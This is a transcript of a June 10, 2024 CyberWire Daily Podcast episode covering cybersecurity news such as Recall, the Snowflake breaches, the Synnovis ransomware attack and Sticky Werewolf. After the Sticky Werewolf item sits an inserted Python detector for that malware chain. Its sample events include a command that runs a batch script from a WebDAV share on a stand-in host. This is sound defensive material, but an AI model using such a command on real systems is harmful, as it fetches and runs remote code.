The CyberWire Daily Podcast 6.10.24
Ep 2085 | 6.10.24

Rethinking recalls.

Transcript

Microsoft makes Recall opt-in. The Senate holds hearings on federal cybersecurity standards. Snowflake’s scrutiny snowballs. New York Times source code is leaked online. Ransomware leads to British hospitals' desperate need for blood donors. Cisco Talos finds 15 serious vulnerabilities in PLCs. Sticky Werewolf targets Russia and Belarus. Frontier Communications warns 750,000 customers of a data breach. Chinese nationals get prison time in Zambia for cybercrimes. N2K’s CSO Rick Howard speaks with Danielle Ruderman, Security GTM Leader, AWS about what keeps CISOs up at night. DIY cell towers can land you in hot water.

Today is Monday, June 10th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Microsoft makes Recall opt-in. 

Microsoft announced significant changes to its Recall feature after receiving criticism from cybersecurity and privacy communities. Recall, which captures screenshots of users' activities every five seconds for AI analysis, will now be opt-in instead of default on Copilot+ compatible Windows versions. This change aims to give users more control over their data.

Pavan Davuluri, Microsoft’s corporate VP for Windows and devices, stated in a blog post that the setup experience for Copilot+ PCs will now clearly allow users to choose whether to enable Recall. If not chosen, it will remain off.

Experts have criticized Recall as potential spyware, as it could silently store sensitive information like bank logins and passwords. While this data is stored locally and not uploaded to the cloud, it could still be accessed by hackers gaining temporary access to the device.

To address security concerns, Microsoft will also introduce measures to better protect Recall data. Users will need to authenticate via Microsoft Hello, using a PIN or biometric check, to enable or access Recall. This data will remain encrypted until the user authenticates.

Despite these changes, privacy issues remain. Users who enable Recall may still be vulnerable to domestic abusers demanding PINs or legal actions that compel them to hand over their data.

The Senate holds hearings on federal cybersecurity standards. 

Senator Gary Peters, a Michigan Democrat and chair of the Homeland Security and Governmental Affairs Committee, held a hearing last Friday to address federal cybersecurity standards and the challenges businesses face in meeting them. The hearing emphasized the need for Congress to pass legislation for a cohesive approach to cybersecurity regulations. Nicholas Leiserson from the Office of the National Cyber Director (ONCD) and David Hinchman from the Government Accountability Office discussed the difficulties in harmonizing these standards and their impact on businesses.

Witnesses highlighted the burdens of multiple cybersecurity standards and the need for streamlined regulations. Peters advocated for a Harmonization Committee to coordinate efforts. Leiserson pointed out that the National Cybersecurity Strategy and National Security Memorandum prioritize regulatory harmonization. The ONCD is developing a reciprocity framework for cybersecurity standards to reduce duplication and improve efficiency. Congress's role in enacting this legislation is crucial for a unified response to cyber threats.

Snowflake’s scrutiny snowballs. 

Cloud provider Snowflake is facing increasing scrutiny following a series of customer data thefts. The thefts were initially linked to Ticketmaster's breach; now LendingTree's subsidiary QuoteWizard has also confirmed that data was stolen from Snowflake. Snowflake attributed these breaches to customers not using multi-factor authentication (MFA), which it does not enforce by default.

Snowflake acknowledged a former employee's demo account was compromised due to single-factor authentication. Despite notifying affected customers, Snowflake has not disclosed the number of impacted clients, though it has over 9,800 customers. Critics argue Snowflake should enforce MFA and reset passwords proactively. The company says it plans to require advanced security controls like MFA in the future but has not provided a specific timeline.

New York Times source code is leaked online. 

Internal source code and data from The New York Times were leaked on the 4chan message board after being stolen from GitHub repositories in January 2024. An anonymous user posted a torrent of a 273GB archive containing the stolen data, which includes source code, IT documentation, and infrastructure tools. The leak was discovered by VX-Underground and confirmed by The Times to BleepingComputer.

The breach occurred due to exposed credentials for a third-party code platform. The Times stated there was no unauthorized access to its internal systems or impact on operations. This incident follows another leak on 4chan of Disney's internal documents, though it is unclear if the same person is responsible for both breaches.

Ransomware leads to British hospitals' desperate need for blood donors. 

A ransomware attack on British pathology services vendor Synnovis has disrupted blood matching in multiple London hospitals. The National Health Service (NHS) urgently seeks O positive and O negative blood donors to address the issue. This June 3 attack has delayed surgeries, organ transplants, and other procedures, as hospitals cannot match patients' blood types as usual.

In response, the NHS plans to use O type blood universally for safety. They aim to fill 13,000 O type blood donor slots immediately, with 3,400 needed in London. The attack, linked to Russian-speaking ransomware groups, has been described as a highly impactful cyber incident. The NHS cybersecurity team is still assessing the full extent of the attack.

Cisco Talos finds 15 serious vulnerabilities in PLCs. 

Cisco’s Talos unit found 15 vulnerabilities in AutomationDirect's Productivity series PLCs, classified as ‘high’ or ‘critical’ severity. These flaws can enable remote code execution or denial-of-service attacks, risking costly industrial disruptions. Although typically not exposed to the internet, about 50 devices might be online, as shown by a Shodan search. AutomationDirect released updates and recommendations to address these issues. The US cybersecurity agency CISA informed organizations of these vulnerabilities in late May.

Sticky Werewolf targets Russia and Belarus. 

Morphisec researchers observed the threat actor Sticky Werewolf targeting entities in Russia and Belarus, including public organizations, a pharmaceutical company, and a microbiology research institute. Initially detected in April 2023, Sticky Werewolf recently targeted the aviation industry with emails supposedly from AO OKB Kristall’s deputy director.

In this campaign, they used phishing emails with archive attachments containing LNK files pointing to a WebDAV server. Once executed, these files run a batch script, leading to an AutoIt script that injects the final payload. The malware used includes Rhadamanthys Stealer and Ozone RAT, facilitating espionage and data exfiltration. Although the group's origin is uncertain, there are possible links to pro-Ukrainian cyberespionage activities.
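The chain described above (clicked LNK, batch script fetched from a WebDAV share, AutoIt interpreter running the stage) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the briefing or from Morphisec; it runs over constructed Sysmon-style events (the host address, file names and field names are assumptions) and flags the steps of that chain.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry), modelled on
# the chain the briefing describes: LNK -> WebDAV-hosted batch script -> AutoIt script.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c "\\203.0.113.10@SSL\DavWWWRoot\docs\update.bat"'},
    {"parent": "cmd.exe", "image": "autoit3.exe",
     "cmdline": r'autoit3.exe C:\Users\Public\stage.a3x'},
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": r'winword.exe C:\Users\alice\Documents\report.docx'},
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c C:\build\run_tests.bat'},   # local batch file: benign
]

# UNC paths with WebDAV markers: \\host@SSL\..., \\host@8080\..., \\host\DavWWWRoot\...
WEBDAV_PATH = re.compile(
    r'\\\\[^\\\s"]+(?:@SSL(?:@\d+)?|@\d+)\\|\\\\[^\\\s"]+\\DavWWWRoot\\', re.I)
SCRIPT_EXT = re.compile(r'\.(bat|cmd)\b', re.I)       # batch script extensions
AUTOIT_SCRIPT = re.compile(r'\.(a3x|au3)\b', re.I)    # compiled / source AutoIt scripts


def classify(event):
    """Return the detection names an event triggers (empty list if nothing matched)."""
    hits = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    # A shell launching a .bat/.cmd from a WebDAV UNC path is the second stage.
    if image in ("cmd.exe", "powershell.exe") and WEBDAV_PATH.search(cmd) \
            and SCRIPT_EXT.search(cmd):
        hits.append("script_from_webdav")
        # explorer.exe as the parent is what a double-clicked LNK looks like.
        if parent == "explorer.exe":
            hits.append("shortcut_launch")
    # The AutoIt interpreter (or any .a3x/.au3 argument) is the third stage.
    if image.startswith("autoit3") or AUTOIT_SCRIPT.search(cmd):
        hits.append("autoit_execution")
    return hits


def scan(events):
    """Return (index, detections) for every event that triggered at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((i, hits))
    return findings
```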

Frontier Communications warns 750,000 customers of a data breach. 

Frontier Communications is warning 750,000 customers of a data breach following an April cyberattack by the RansomHub ransomware group. The breach exposed personal information, including full names and Social Security Numbers, but not financial information. The company has informed regulatory authorities and implemented additional security measures. Affected customers are advised to enroll in free credit monitoring and identity theft services provided by Kroll. RansomHub has threatened to leak 5GB of stolen data if Frontier does not respond by June 14.

Chinese nationals get prison time in Zambia for cybercrimes. 

A Zambian court sentenced 22 Chinese nationals to prison terms ranging from seven to 11 years for cybercrimes, including internet fraud and online scams targeting Zambians and individuals from Singapore, Peru, and the UAE. They were also fined between $1,500 and $3,000. A Cameroonian was similarly sentenced. The group was part of a 77-member syndicate arrested in April for a sophisticated internet fraud scheme. Authorities seized over 13,000 SIM cards, firearms, and ammunition from the Chinese-run Golden Top Support Services in Lusaka. The syndicate employed unsuspecting Zambians to conduct deceptive conversations using various platforms.

We’ll be right back. After the break, N2K’s CSO Rick Howard speaks with Danielle Ruderman, Security GTM Leader, AWS about what keeps CISOs up at night and learnings from AWS CISO Circles. 

Welcome back. You can catch more with Rick and the N2K team at AWS’ Re:Inforce event happening this week.

DIY cell towers land two in the UK in hot water. 

And finally, British police nabbed two individuals for operating homemade cell towers used to send phishing texts. These "text message blasters" cleverly dodged network anti-smishing controls, spamming thousands with fake messages posing as banks and other official entities.

British law enforcement authorities noted the increasing cunning of cybercriminals, reminding everyone that legitimate organizations won’t ask for personal info via text. To counter this, UK networks have a handy scheme: forward suspicious texts to them for analysis and potential blocking.

Huayong Xu, 32, was arrested in Croydon and faces fraud charges, while another unnamed individual was arrested in Manchester. Authorities, including Ofcom and the NCSC, are investigating, but details are sparse due to the sensitive nature of the tactics involved.

It's suspected these devices could be IMSI catchers, popularly known as Stingrays, sometimes used by law enforcement for intercepting communications by spoofing legitimate cell towers. 

There’s no word on how exactly the suspects were tracked down, but being a long-time admirer of ham radio enthusiasts, part of me hopes that it was an old-fashioned fox hunt.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.


We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.